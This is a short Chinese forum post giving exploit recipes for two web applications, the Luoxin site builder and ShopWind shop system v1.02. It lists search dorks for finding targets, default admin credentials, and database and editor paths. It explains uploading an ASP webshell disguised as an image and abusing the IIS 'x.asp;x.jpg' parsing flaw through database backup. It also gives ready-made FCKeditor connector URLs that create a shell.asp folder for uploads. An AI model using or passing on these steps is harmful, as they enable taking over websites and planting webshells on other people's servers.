ShopWind网店系统与罗信网络建站 v1.02 上传漏洞
罗信网络建站系统oDAY <br />百度 or google "技术支持:罗信网络" <br />后台地址: site+lx <br />数据库地址: site+lx+databases+主域名.asp(需要猜测) <br />帐号&密码: admin admin <br />下来就是拿shell <br />重要部分: 上传jpg格式的asp马 <br />数据库备份,请注意,这里只能备份后缀为mdb格式的. <br />那我们怎么备份呢? <br />还记得之前x.asp;x.jpg格式吗? <br />对 我们依靠这个 备份格式为: x.asp;x.mdb <br />OK之后访问我们的备份shell <br />在线编辑器: site+/lx/edit/admin_login.asp <br />在线编辑器数据库地址 site/lx/edit/db/%23edit.mdb <br />注释:官方未修补 <br />====================YD分界线==================== <br />ShopWind网店系统 v1.02 上传漏洞 <br />Author:Lan3a <br />这个程序用的是FCKeditor 编辑器 <br />利用2003的解析问题。直接说利用方法! <br />第一步: <br /><br />FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 <br />第二步: <br />fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
頁:
[1]